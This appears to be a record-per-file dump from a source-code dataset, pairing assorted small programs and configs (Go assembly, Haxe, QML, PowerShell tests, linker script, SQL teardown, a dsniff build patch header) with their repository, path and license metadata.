<None Include="res\drawable-hdpi\icon.png">
<SubType>Content</SubType>
</None>
<None Include="res\drawable-mdpi\icon.png">
<SubType>Content</SubType>
</None>
<None Include="res\drawable-ldpi\icon.png">
<SubType>Content</SubType>
</None>
<None Include="res\drawable-xhdpi\icon.png">
<SubType>Content</SubType>
</None>
</ItemGroup>
<ItemGroup>
<AndroidManifest Include="Properties\AndroidManifest.android-xml" />
</ItemGroup>
<ItemGroup>
<Reference Include="android-support-v7-cardview.jar">
<HintPath>C:\Users\Sven\AppData\Local\Android\android-sdk\extras\android\support\v7\cardview\libs\android-support-v7-cardview.jar</HintPath>
<Private>True</Private>
</Reference>
<Reference Include="android.jar" />
<Reference Include="com.remobjects.elements.rtl.jar">
<HintPath>com.remobjects.elements.rtl.jar</HintPath>
<Private>True</Private>
</Reference>
</ItemGroup>
<ItemGroup>
<Compile Include="CardViewFragment.pas" />
<Compile Include="MainActivity.pas" />
</ItemGroup>
<ItemGroup>
<Content Include="res\drawable-hdpi\tile.9.png">
<SubType>Content</SubType>
</Content>
</ItemGroup>
<Import Project="$(MSBuildExtensionsPath)\RemObjects Software\Oxygene\RemObjects.Oxygene.Cooper.Android.targets" />
<PropertyGroup>
<PreBuildEvent />
</PropertyGroup>
</Project> | Oxygene | 1 | teamro/elements-samples | Oxygene/Java/Android/com.remobjects.CardView/com.remobjects.CardView.oxygene | [
"MIT"
] |
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="require-trusted-types-for 'script'; trusted-types *">
</head>
<body>
<webview preload="../module/isolated-ping.js" src="about:blank"/>
</body>
</html>
| HTML | 1 | lingxiao-Zhu/electron | spec/fixtures/pages/webview-trusted-types.html | [
"MIT"
] |
echo n2-$2
echo $2 >>$2.count
echo $2 >>in.countall
# we deliberately use 'redo' here instead of redo-ifchange, because this *heavily*
# stresses redo's locking when building in parallel. We end up with 100
# different targets that all not only depend on this file, but absolutely must
# acquire the lock on this file, build it atomically, and release the lock.
redo countall
| Stata | 3 | BlameJohnny/redo | t/950-curse/default.n2.do | [
"Apache-2.0"
] |
"""Constants for the flo integration."""
import logging
LOGGER = logging.getLogger(__package__)
CLIENT = "client"
DOMAIN = "flo"
FLO_HOME = "home"
FLO_AWAY = "away"
FLO_SLEEP = "sleep"
FLO_MODES = [FLO_HOME, FLO_AWAY, FLO_SLEEP]
| Python | 3 | tbarbette/core | homeassistant/components/flo/const.py | [
"Apache-2.0"
] |
{
"Version" : 0.2,
"ModuleName" : "ungif",
"Options" : {
"Debug" : false,
"Optimization" : "None",
"TargetType" : "StaticLibrary",
"TargetFileName" : "ungif",
"BuildBitDepth" : "Bits32"
},
"Configurations" : [
{
"Name" : "Debug",
"Options" : {
"Warnings" : "All",
"Debug" : true,
"FastMath" : false
}
},
{
"Name" : "Release",
"Options" : {
"Warnings" : "None",
"Optimization" : "Speed",
"FastMath" : true
}
}
],
"Files" : [
{
"Folder" : "lib",
"Files" : [
"dgif_lib.c",
"gif_err.c",
"gifalloc.c"
]
},
{
"Folder" : "headers",
"Files" : [
"lib/getarg.h",
"lib/gif_lib.h",
"lib/gif_lib_private.h"
]
}
],
"ResourcesPath" : "",
"Resources" : [
]
}
| Ecere Projects | 2 | N-eil/ecere-sdk | deps/libungif-4.1.1/libungif.epj | [
"BSD-3-Clause"
] |
# pylint: skip-file
from common.kalman.simple_kalman_impl import KF1D as KF1D
assert KF1D
| Python | 1 | Neptos/openpilot | common/kalman/simple_kalman.py | [
"MIT"
] |
// Copyright 2018 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
//go:build ppc64 || ppc64le
// +build ppc64 ppc64le
#include "go_asm.h"
#include "textflag.h"
TEXT ·IndexByte<ABIInternal>(SB),NOSPLIT|NOFRAME,$0-40
#ifndef GOEXPERIMENT_regabiargs
MOVD b_base+0(FP), R3 // R3 = byte array pointer
MOVD b_len+8(FP), R4 // R4 = length
MOVBZ c+24(FP), R5 // R5 = byte
MOVD $ret+32(FP), R14 // R14 = &ret
#else
MOVD R6, R5
#endif
BR indexbytebody<>(SB)
TEXT ·IndexByteString<ABIInternal>(SB),NOSPLIT|NOFRAME,$0-32
#ifndef GOEXPERIMENT_regabiargs
MOVD s_base+0(FP), R3 // R3 = string
MOVD s_len+8(FP), R4 // R4 = length
MOVBZ c+16(FP), R5 // R5 = byte
MOVD $ret+24(FP), R14 // R14 = &ret
#endif
BR indexbytebody<>(SB)
// R3 = addr of string
// R4 = len of string
// R5 = byte to find
// R14 = addr of return value when not regabi
TEXT indexbytebody<>(SB),NOSPLIT|NOFRAME,$0-0
MOVD R3,R17 // Save base address for calculating the index later.
RLDICR $0,R3,$60,R8 // Align address to doubleword boundary in R8.
RLDIMI $8,R5,$48,R5 // Replicating the byte across the register.
ADD R4,R3,R7 // Last acceptable address in R7.
DCBT (R8) // Prepare cache line.
RLDIMI $16,R5,$32,R5
CMPU R4,$32 // Check if it's a small string (≤32 bytes). Those will be processed differently.
MOVD $-1,R9
WORD $0x54661EB8 // Calculate padding in R6 (rlwinm r6,r3,3,26,28).
RLDIMI $32,R5,$0,R5
MOVD R7,R10 // Save last acceptable address in R10 for later.
ADD $-1,R7,R7
#ifdef GOARCH_ppc64le
SLD R6,R9,R9 // Prepare mask for Little Endian
#else
SRD R6,R9,R9 // Same for Big Endian
#endif
BLE small_string // Jump to the small string case if it's ≤32 bytes.
// If we are 64-byte aligned, branch to qw_align just to get the auxiliary values
// in V0, V1 and V10, then branch to the preloop.
ANDCC $63,R3,R11
BEQ CR0,qw_align
RLDICL $0,R3,$61,R11
MOVD 0(R8),R12 // Load one doubleword from the aligned address in R8.
CMPB R12,R5,R3 // Check for a match.
AND R9,R3,R3 // Mask bytes below s_base
RLDICL $0,R7,$61,R6 // length-1
RLDICR $0,R7,$60,R7 // Last doubleword in R7
CMPU R3,$0,CR7 // If we have a match, jump to the final computation
BNE CR7,done
ADD $8,R8,R8
ADD $-8,R4,R4
ADD R4,R11,R4
// Check for quadword alignment
ANDCC $15,R8,R11
BEQ CR0,qw_align
// Not aligned, so handle the next doubleword
MOVD 0(R8),R12
CMPB R12,R5,R3
CMPU R3,$0,CR7
BNE CR7,done
ADD $8,R8,R8
ADD $-8,R4,R4
// Either quadword aligned or 64-byte at this point. We can use LVX.
qw_align:
// Set up auxiliary data for the vectorized algorithm.
VSPLTISB $0,V0 // Replicate 0 across V0
VSPLTISB $3,V10 // Use V10 as control for VBPERMQ
MTVRD R5,V1
LVSL (R0+R0),V11
VSLB V11,V10,V10
VSPLTB $7,V1,V1 // Replicate byte across V1
CMPU R4, $64 // If len ≤ 64, don't use the vectorized loop
BLE tail
// We will load 4 quardwords per iteration in the loop, so check for
// 64-byte alignment. If 64-byte aligned, then branch to the preloop.
ANDCC $63,R8,R11
BEQ CR0,preloop
// Not 64-byte aligned. Load one quadword at a time until aligned.
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6 // Check for byte in V4
BNE CR6,found_qw_align
ADD $16,R8,R8
ADD $-16,R4,R4
ANDCC $63,R8,R11
BEQ CR0,preloop
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6 // Check for byte in V4
BNE CR6,found_qw_align
ADD $16,R8,R8
ADD $-16,R4,R4
ANDCC $63,R8,R11
BEQ CR0,preloop
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6 // Check for byte in V4
BNE CR6,found_qw_align
ADD $-16,R4,R4
ADD $16,R8,R8
// 64-byte aligned. Prepare for the main loop.
preloop:
CMPU R4,$64
BLE tail // If len ≤ 64, don't use the vectorized loop
// We are now aligned to a 64-byte boundary. We will load 4 quadwords
// per loop iteration. The last doubleword is in R10, so our loop counter
// starts at (R10-R8)/64.
SUB R8,R10,R6
SRD $6,R6,R9 // Loop counter in R9
MOVD R9,CTR
ADD $-64,R8,R8 // Adjust index for loop entry
MOVD $16,R11 // Load offsets for the vector loads
MOVD $32,R9
MOVD $48,R7
// Main loop we will load 64 bytes per iteration
loop:
ADD $64,R8,R8 // Fuse addi+lvx for performance
LVX (R8+R0),V2 // Load 4 16-byte vectors
LVX (R8+R11),V3
VCMPEQUB V1,V2,V6 // Look for byte in each vector
VCMPEQUB V1,V3,V7
LVX (R8+R9),V4
LVX (R8+R7),V5
VCMPEQUB V1,V4,V8
VCMPEQUB V1,V5,V9
VOR V6,V7,V11 // Compress the result in a single vector
VOR V8,V9,V12
VOR V11,V12,V13
VCMPEQUBCC V0,V13,V14 // Check for byte
BGE CR6,found
BC 16,0,loop // bdnz loop
// Handle the tailing bytes or R4 ≤ 64
RLDICL $0,R6,$58,R4
ADD $64,R8,R8
tail:
CMPU R4,$0
BEQ notfound
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6
BNE CR6,found_qw_align
ADD $16,R8,R8
CMPU R4,$16,CR6
BLE CR6,notfound
ADD $-16,R4,R4
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6
BNE CR6,found_qw_align
ADD $16,R8,R8
CMPU R4,$16,CR6
BLE CR6,notfound
ADD $-16,R4,R4
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6
BNE CR6,found_qw_align
ADD $16,R8,R8
CMPU R4,$16,CR6
BLE CR6,notfound
ADD $-16,R4,R4
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6
BNE CR6,found_qw_align
notfound:
MOVD $-1,R3
#ifndef GOEXPERIMENT_regabiargs
MOVD R3,(R14)
#endif
RET
found:
// We will now compress the results into a single doubleword,
// so it can be moved to a GPR for the final index calculation.
// The bytes in V6-V9 are either 0x00 or 0xFF. So, permute the
// first bit of each byte into bits 48-63.
VBPERMQ V6,V10,V6
VBPERMQ V7,V10,V7
VBPERMQ V8,V10,V8
VBPERMQ V9,V10,V9
// Shift each 16-bit component into its correct position for
// merging into a single doubleword.
#ifdef GOARCH_ppc64le
VSLDOI $2,V7,V7,V7
VSLDOI $4,V8,V8,V8
VSLDOI $6,V9,V9,V9
#else
VSLDOI $6,V6,V6,V6
VSLDOI $4,V7,V7,V7
VSLDOI $2,V8,V8,V8
#endif
// Merge V6-V9 into a single doubleword and move to a GPR.
VOR V6,V7,V11
VOR V8,V9,V4
VOR V4,V11,V4
MFVRD V4,R3
#ifdef GOARCH_ppc64le
ADD $-1,R3,R11
ANDN R3,R11,R11
POPCNTD R11,R11 // Count trailing zeros (Little Endian).
#else
CNTLZD R3,R11 // Count leading zeros (Big Endian).
#endif
ADD R8,R11,R3 // Calculate byte address
return:
SUB R17,R3
#ifndef GOEXPERIMENT_regabiargs
MOVD R3,(R14)
#endif
RET
found_qw_align:
// Use the same algorithm as above. Compress the result into
// a single doubleword and move it to a GPR for the final
// calculation.
VBPERMQ V6,V10,V6
#ifdef GOARCH_ppc64le
MFVRD V6,R3
ADD $-1,R3,R11
ANDN R3,R11,R11
POPCNTD R11,R11
#else
VSLDOI $6,V6,V6,V6
MFVRD V6,R3
CNTLZD R3,R11
#endif
ADD R8,R11,R3
CMPU R11,R4
BLT return
BR notfound
done:
// At this point, R3 has 0xFF in the same position as the byte we are
// looking for in the doubleword. Use that to calculate the exact index
// of the byte.
#ifdef GOARCH_ppc64le
ADD $-1,R3,R11
ANDN R3,R11,R11
POPCNTD R11,R11 // Count trailing zeros (Little Endian).
#else
CNTLZD R3,R11 // Count leading zeros (Big Endian).
#endif
CMPU R8,R7 // Check if we are at the last doubleword.
SRD $3,R11 // Convert trailing zeros to bytes.
ADD R11,R8,R3
CMPU R11,R6,CR7 // If at the last doubleword, check the byte offset.
BNE return
BLE CR7,return
BR notfound
small_string:
// We unroll this loop for better performance.
CMPU R4,$0 // Check for length=0
BEQ notfound
MOVD 0(R8),R12 // Load one doubleword from the aligned address in R8.
CMPB R12,R5,R3 // Check for a match.
AND R9,R3,R3 // Mask bytes below s_base.
CMPU R3,$0,CR7 // If we have a match, jump to the final computation.
RLDICL $0,R7,$61,R6 // length-1
RLDICR $0,R7,$60,R7 // Last doubleword in R7.
CMPU R8,R7
BNE CR7,done
BEQ notfound // Hit length.
MOVDU 8(R8),R12
CMPB R12,R5,R3
CMPU R3,$0,CR6
CMPU R8,R7
BNE CR6,done
BEQ notfound
MOVDU 8(R8),R12
CMPB R12,R5,R3
CMPU R3,$0,CR6
CMPU R8,R7
BNE CR6,done
BEQ notfound
MOVDU 8(R8),R12
CMPB R12,R5,R3
CMPU R3,$0,CR6
CMPU R8,R7
BNE CR6,done
BEQ notfound
MOVDU 8(R8),R12
CMPB R12,R5,R3
CMPU R3,$0,CR6
BNE CR6,done
BR notfound
| GAS | 5 | rleungx/go | src/internal/bytealg/indexbyte_ppc64x.s | [
"BSD-3-Clause"
] |
public class Test : GLib.Object {
construct {
stdout.printf("Test from main directory\n");
}
}
| Vala | 3 | kira78/meson | test cases/vala/22 same target in directories/Test.vala | [
"Apache-2.0"
] |
// name: flute.ck
// desc: demo of Faust chugin in action!
// instantiate and connect faust => ck
Faust flute => dac;
// evaluate Faust code
flute.eval(`
process = pm.flute_ui_MIDI <: _,_;
`);
// dump parameters
flute.dump();
// time loop
while( true )
{
flute.v("/flute/gate",1); // start note
flute.v("/flute/midi/freq", Math.random2f(100,800) ); // assign pitch
300::ms => now; // "sustain"
flute.v("/flute/gate",0); // end note
100::ms => now; // give it some time to "breath"
}
| ChucK | 4 | ccdarabundit/chugins | Faust/examples/flute.ck | [
"MIT"
] |
very foo is new Bar with a, b, c
| Dogescript | 0 | erinkeith/dogescript | test/spec/var/new/multi-args-comma/source.djs | [
"MIT"
] |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.thrift.helper;
import haxe.Int64;
import haxe.io.Bytes;
import haxe.io.BytesBuffer;
class BitConverter {
public static function DoubleToInt64Bits( db : Float) : Int64 {
var buf = new BytesBuffer();
buf.addDouble( db);
return bytesToLong( buf.getBytes());
}
public static function Int64BitsToDouble( i64 : Int64) : Float {
var buf = new BytesBuffer();
buf.add( fixedLongToBytes( i64));
return buf.getBytes().getDouble(0);
}
/**
* Convert a long into little-endian bytes in buf starting at off and going
* until off+7.
*/
public static function fixedLongToBytes( n : Int64) : Bytes {
var buf = Bytes.alloc(8);
#if( haxe_ver < 3.2)
buf.set( 0, Int64.getLow( Int64.and( n, Int64.make(0, 0xff))));
buf.set( 1, Int64.getLow( Int64.and( Int64.shr( n, 8), Int64.make(0, 0xff))));
buf.set( 2, Int64.getLow( Int64.and( Int64.shr( n, 16), Int64.make(0, 0xff))));
buf.set( 3, Int64.getLow( Int64.and( Int64.shr( n, 24), Int64.make(0, 0xff))));
buf.set( 4, Int64.getLow( Int64.and( Int64.shr( n, 32), Int64.make(0, 0xff))));
buf.set( 5, Int64.getLow( Int64.and( Int64.shr( n, 40), Int64.make(0, 0xff))));
buf.set( 6, Int64.getLow( Int64.and( Int64.shr( n, 48), Int64.make(0, 0xff))));
buf.set( 7, Int64.getLow( Int64.and( Int64.shr( n, 56), Int64.make(0, 0xff))));
#else
buf.set( 0, Int64.and( n, Int64.make(0, 0xff)).low);
buf.set( 1, Int64.and( Int64.shr( n, 8), Int64.make(0, 0xff)).low);
buf.set( 2, Int64.and( Int64.shr( n, 16), Int64.make(0, 0xff)).low);
buf.set( 3, Int64.and( Int64.shr( n, 24), Int64.make(0, 0xff)).low);
buf.set( 4, Int64.and( Int64.shr( n, 32), Int64.make(0, 0xff)).low);
buf.set( 5, Int64.and( Int64.shr( n, 40), Int64.make(0, 0xff)).low);
buf.set( 6, Int64.and( Int64.shr( n, 48), Int64.make(0, 0xff)).low);
buf.set( 7, Int64.and( Int64.shr( n, 56), Int64.make(0, 0xff)).low);
#end
return buf;
}
/**
* Note that it's important that the mask bytes are long literals,
* otherwise they'll default to ints, and when you shift an int left 56 bits,
* you just get a messed up int.
*/
public static function bytesToLong( bytes : Bytes) : Int64 {
var result : Int64 = Int64.make(0, 0);
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(7)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(6)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(5)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(4)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(3)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(2)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(1)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(0)));
return result;
}
#if debug
private static function TestBTL( test : Int64) : Void {
var buf : Bytes = fixedLongToBytes( test);
var erg = bytesToLong(buf);
if ( Int64.compare( erg, test) != 0)
throw 'BitConverter.bytesToLongTest($test) failed: $erg';
}
#end
#if debug
private static function TestPair( a : Float, b : Int64) : Void {
var bx = DoubleToInt64Bits(a);
if ( Int64.compare( bx, b) != 0)
throw 'BitConverter.TestPair: DoubleToInt64Bits($a): expected $b, got $bx';
var ax = Int64BitsToDouble(b);
if( ax != a)
throw 'BitConverter.TestPair: Int64BitsToDouble($b: expected $a, got $ax';
}
#end
#if debug
public static function UnitTest() : Void {
// bytesToLong()
var i : Int;
TestBTL( Int64.make(0,0));
for ( i in 0 ... 62) {
TestBTL( Int64.shl( Int64.make(0,1), i));
TestBTL( Int64.sub( Int64.make(0,0), Int64.shl( Int64.make(0,1), i)));
}
TestBTL( Int64.make(0x7FFFFFFF,0xFFFFFFFF));
TestBTL( Int64.make(cast(0x80000000,Int),0x00000000));
// DoubleToInt64Bits;
TestPair( 1.0000000000000000E+000, Int64.make(cast(0x3FF00000,Int),cast(0x00000000,Int)));
TestPair( 1.5000000000000000E+001, Int64.make(cast(0x402E0000,Int),cast(0x00000000,Int)));
TestPair( 2.5500000000000000E+002, Int64.make(cast(0x406FE000,Int),cast(0x00000000,Int)));
TestPair( 4.2949672950000000E+009, Int64.make(cast(0x41EFFFFF,Int),cast(0xFFE00000,Int)));
TestPair( 3.9062500000000000E-003, Int64.make(cast(0x3F700000,Int),cast(0x00000000,Int)));
TestPair( 2.3283064365386963E-010, Int64.make(cast(0x3DF00000,Int),cast(0x00000000,Int)));
TestPair( 1.2345678901230000E-300, Int64.make(cast(0x01AA74FE,Int),cast(0x1C1E7E45,Int)));
TestPair( 1.2345678901234500E-150, Int64.make(cast(0x20D02A36,Int),cast(0x586DB4BB,Int)));
TestPair( 1.2345678901234565E+000, Int64.make(cast(0x3FF3C0CA,Int),cast(0x428C59FA,Int)));
TestPair( 1.2345678901234567E+000, Int64.make(cast(0x3FF3C0CA,Int),cast(0x428C59FB,Int)));
TestPair( 1.2345678901234569E+000, Int64.make(cast(0x3FF3C0CA,Int),cast(0x428C59FC,Int)));
TestPair( 1.2345678901234569E+150, Int64.make(cast(0x5F182344,Int),cast(0xCD3CDF9F,Int)));
TestPair( 1.2345678901234569E+300, Int64.make(cast(0x7E3D7EE8,Int),cast(0xBCBBD352,Int)));
TestPair( -1.7976931348623157E+308, Int64.make(cast(0xFFEFFFFF,Int),cast(0xFFFFFFFF,Int)));
TestPair( 1.7976931348623157E+308, Int64.make(cast(0x7FEFFFFF,Int),cast(0xFFFFFFFF,Int)));
TestPair( 4.9406564584124654E-324, Int64.make(cast(0x00000000,Int),cast(0x00000001,Int)));
TestPair( 0.0000000000000000E+000, Int64.make(cast(0x00000000,Int),cast(0x00000000,Int)));
TestPair( 4.94065645841247E-324, Int64.make(cast(0x00000000,Int),cast(0x00000001,Int)));
TestPair( 3.2378592100206092E-319, Int64.make(cast(0x00000000,Int),cast(0x0000FFFF,Int)));
TestPair( 1.3906711615669959E-309, Int64.make(cast(0x0000FFFF,Int),cast(0xFFFFFFFF,Int)));
TestPair( Math.NEGATIVE_INFINITY, Int64.make(cast(0xFFF00000,Int),cast(0x00000000,Int)));
TestPair( Math.POSITIVE_INFINITY, Int64.make(cast(0x7FF00000,Int),cast(0x00000000,Int)));
// NaN is special
var i64nan = DoubleToInt64Bits( Math.NaN);
var i64cmp = Int64.make(cast(0xFFF80000, Int), cast(0x00000000, Int));
if ( ! Math.isNaN( Int64BitsToDouble( i64cmp)))
throw 'BitConverter NaN-Test #1: expected NaN';
// For doubles, a quiet NaN is a bit pattern
// between 7FF8000000000000 and 7FFFFFFFFFFFFFFF
// or FFF8000000000000 and FFFFFFFFFFFFFFFF
var min1 = Int64.make( cast(0x7FF80000, Int), cast(0x00000000, Int));
var max1 = Int64.make( cast(0x7FFFFFFF, Int), cast(0xFFFFFFFF, Int));
var min2 = Int64.make( cast(0xFFF80000, Int), cast(0x00000000, Int));
var max2 = Int64.make( cast(0xFFFFFFFF, Int), cast(0xFFFFFFFF, Int));
var ok1 = (Int64.compare( min1, i64nan) <= 0) && (Int64.compare( i64nan, max1) <= 0);
var ok2 = (Int64.compare( min2, i64nan) <= 0) && (Int64.compare( i64nan, max2) <= 0);
if( ! (ok1 || ok2))
throw 'BitConverter NaN-Test #2: failed';
}
#end
}
| Haxe | 5 | Jimexist/thrift | lib/haxe/src/org/apache/thrift/helper/BitConverter.hx | [
"Apache-2.0"
] |
DROP TABLE IF EXISTS hdb_catalog.hdb_source_catalog_version;
DROP FUNCTION IF EXISTS hdb_catalog.insert_event_log(text, text, text, text, json);
DROP TABLE IF EXISTS hdb_catalog.event_invocation_logs;
DROP TABLE IF EXISTS hdb_catalog.event_log;
| SQL | 1 | gh-oss-contributor/graphql-engine-1 | server/src-rsr/drop_pg_source.sql | [
"Apache-2.0",
"MIT"
] |
This utility only reads in a file and prints it out
Read:
>+[>,]
Rewind:
<[<]
Write:
>>[.>]
| Brainfuck | 1 | RubenNL/brainheck | examples/cat-1.bf | [
"Apache-2.0"
] |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
Describe "Hierarchical paths" -Tags "CI" {
BeforeAll {
$data = "Hello World"
Setup -File testFile.txt -Content $data
}
It "should work with Join-Path " {
$testPath = Join-Path $TestDrive testFile.txt
Get-Content $testPath | Should -BeExactly $data
}
It "should work with platform's slashes" {
$testPath = "$TestDrive$([IO.Path]::DirectorySeparatorChar)testFile.txt"
Get-Content $testPath | Should -BeExactly $data
}
It "should work with forward slashes" {
$testPath = "$TestDrive/testFile.txt"
Get-Content $testPath | Should -BeExactly $data
}
It "should work with backward slashes" {
$testPath = "$TestDrive\testFile.txt"
Get-Content $testPath | Should -BeExactly $data
}
It "should work with backward slashes for each separator" {
$testPath = "$TestDrive\testFile.txt".Replace("/","\")
Get-Content $testPath | Should -BeExactly $data
}
It "should work with forward slashes for each separator" {
$testPath = "$TestDrive/testFile.txt".Replace("\","/")
Get-Content $testPath | Should -BeExactly $data
}
It "should work even if there are too many forward slashes" {
$testPath = "$TestDrive//////testFile.txt"
Get-Content $testPath | Should -BeExactly $data
}
It "should work even if there are too many backward slashes" {
$testPath = "$TestDrive\\\\\\\testFile.txt"
Get-Content $testPath | Should -BeExactly $data
}
}
| PowerShell | 4 | rdtechie/PowerShell | test/powershell/Modules/Microsoft.PowerShell.Management/Hierarchical-Path.Tests.ps1 | [
"MIT"
] |
package com.baeldung.autovalue;
public class MutableMoney {
@Override
public String toString() {
return "MutableMoney [amount=" + amount + ", currency=" + currency + "]";
}
public long getAmount() {
return amount;
}
public void setAmount(long amount) {
this.amount = amount;
}
public String getCurrency() {
return currency;
}
public void setCurrency(String currency) {
this.currency = currency;
}
private long amount;
private String currency;
public MutableMoney(long amount, String currency) {
super();
this.amount = amount;
this.currency = currency;
}
}
| Java | 4 | zeesh49/tutorials | autovalue/src/main/java/com/baeldung/autovalue/MutableMoney.java | [
"MIT"
] |
MEMORY
{
ram (rw) : o = 0x0000400, l = 31k
rom (rx) : o = 0x00A0000, l = 384k
nrom(rx) : o = 0x0000F000, l = 4k
xram(rw) : o = 0x00028000, l = 4k
}
_system_stack_size = 0x800;
SECTIONS
{
/* Variable Vector Section */
.var_vects 0x000FA000 :
{
KEEP(*( .var_vects))
} > rom
.text 0x000DD000 :
{
*(.text)
*(.text.*)
/* section information for finsh shell */
. = ALIGN(4);
___fsymtab_start = .;
KEEP(*(FSymTab))
___fsymtab_end = .;
. = ALIGN(4);
___vsymtab_start = .;
KEEP(*(VSymTab))
___vsymtab_end = .;
. = ALIGN(4);
etext = .;
} > rom
.rodata :
{
_rodata = .;
*(.rodata)
*(.rodata.*)
*(.frodata)
_erodata = .;
} > rom
.init :
{
*(.init)
} > rom
.fini :
{
*(.fini)
} > rom
.got :
{
*(.got)
*(.got.plt)
} > rom
.eh_frame_hdr :
{
*(.eh_frame_hdr)
} > rom
.eh_frame :
{
*(.eh_frame)
} > rom
.jcr :
{
*(.jcr)
} > rom
.tors :
{
__CTOR_LIST__ = .;
___ctors = .;
*(.ctors)
___ctors_end = .;
__CTOR_END__ = .;
__DTOR_LIST__ = .;
___dtors = .;
*(.dtors)
___dtors_end = .;
__DTOR_END__ = .;
_mdata = .;
} > rom
.data 0x00000400 : AT (_mdata)
{
_data = .;
*(.data)
*(.data.*)
*(.ndata)
*(.ndata.*)
*(.plt)
_edata = .;
} > ram
.bss :
{
_bss = .;
*(.bss)
*(COMMON)
*(.nbss)
_ebss = .;
_end = .;
} > ram
.gcc_exc :
{
*(.gcc_exc)
} > ram
/* User Stack Pointer */
/*
.ustack 0x00003000 :
{
_ustack = .;
} > ram
*/
/* Interrupt Stack Pointer */
.istack :
{
. = . + _system_stack_size;
. = ALIGN(4);
_istack = .;
} > ram
. = ALIGN(4);
_user_ram_end = .;
.nrodata 0x0000F000 :
{
_nrodata = .;
*(.nrodata)
*(.nrodata.*)
_enrodata = .;
} > nrom
.fdata 0x00028000 : AT (_mdata + SIZEOF(.data))
{
_fdata = .;
*(.fdata)
*(.fdata.*)
_efdata = .;
} > xram
.fbss :
{
_fbss = .;
*(.fbss)
*(.fbss.*)
_efbss = .;
} > xram
/* Fixed Vector Section */
.vects 0x000FFFDC :
{
KEEP(*( .vects))
} > rom
} | Linker Script | 4 | Davidfind/rt-thread | bsp/m16c62p/m16c62p.ld | [
"Apache-2.0"
] |
import QtQuick 2.3
import QtQuick.Controls 1.2
import QtQuick.Controls.Styles 1.4
import QGroundControl.ScreenTools 1.0
import QGroundControl.Palette 1.0
Item {
id: _root
signal clicked()
property alias buttonImage: button.source
property real radius: ScreenTools.isMobile ? ScreenTools.defaultFontPixelHeight * 1.75 : ScreenTools.defaultFontPixelHeight * 1.25
property bool rotateImage: false
property bool lightBorders: true
width: radius * 2
height: radius * 2
property bool checked: false
property ExclusiveGroup exclusiveGroup: null
QGCPalette { id: qgcPal }
onExclusiveGroupChanged: {
if (exclusiveGroup) {
exclusiveGroup.bindCheckable(_root)
}
}
onRotateImageChanged: {
if (rotateImage) {
imageRotation.running = true
} else {
imageRotation.running = false
button.rotation = 0
}
}
Rectangle {
anchors.fill: parent
radius: width / 2
border.width: ScreenTools.defaultFontPixelHeight * 0.0625
border.color: lightBorders ? qgcPal.mapWidgetBorderLight : qgcPal.mapWidgetBorderDark
color: checked ? qgcPal.buttonHighlight : qgcPal.button
QGCColoredImage {
id: button
anchors.fill: parent
sourceSize.height: parent.height
fillMode: Image.PreserveAspectFit
mipmap: true
smooth: true
color: checked ? qgcPal.buttonHighlightText : qgcPal.buttonText
RotationAnimation on rotation {
id: imageRotation
loops: Animation.Infinite
from: 0
to: 360
duration: 500
running: false
}
MouseArea {
anchors.fill: parent
onClicked: {
checked = !checked
_root.clicked()
}
}
}
}
}
| QML | 4 | uavosky/uavosky-qgroundcontrol | src/QmlControls/RoundButton.qml | [
"Apache-2.0"
] |
#AutoIt3Wrapper_Change2CUI=y
ConsoleWrite("Hello World !")
sleep(99999999)
| AutoIt | 1 | tanay-pingalkar/HelloWorld | autoit/HelloWorld.au3 | [
"MIT"
] |
//===--- UnavailableFoundationMethodThunks.mm -----------------------------===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
#include <Foundation/Foundation.h>
#include "swift/Runtime/Config.h"
SWIFT_CC(swift) SWIFT_RUNTIME_LIBRARY_VISIBILITY
extern "C" void
NSArray_getObjects(NSArray *_Nonnull nsArray,
id *objects, NSUInteger rangeLocation,
NSUInteger rangeLength) {
[nsArray getObjects:objects range:NSMakeRange(rangeLocation, rangeLength)];
}
SWIFT_CC(swift) SWIFT_RUNTIME_LIBRARY_VISIBILITY
extern "C" void
NSDictionary_getObjectsAndKeysWithCount(NSDictionary *_Nonnull nsDictionary,
id *objects, id *keys,
NSInteger count) {
[nsDictionary getObjects:objects andKeys:keys count:count];
}
| Objective-C++ | 3 | lwhsu/swift | stdlib/private/StdlibUnittestFoundationExtras/UnavailableFoundationMethodThunks.mm | [
"Apache-2.0"
] |
#! /bin/sh /usr/share/dpatch/dpatch-run
## 12_arpa_inet_header.dpatch by Luciano Bello <luciano@linux.org.ar>
##
## All lines beginning with `## DP:' are a description of the patch.
## DP: aviod the "implicit declaration of function 'ntohs'" warning
@DPATCH@
diff -urNad dsniff-2.4b1+debian~/decode_aim.c dsniff-2.4b1+debian/decode_aim.c
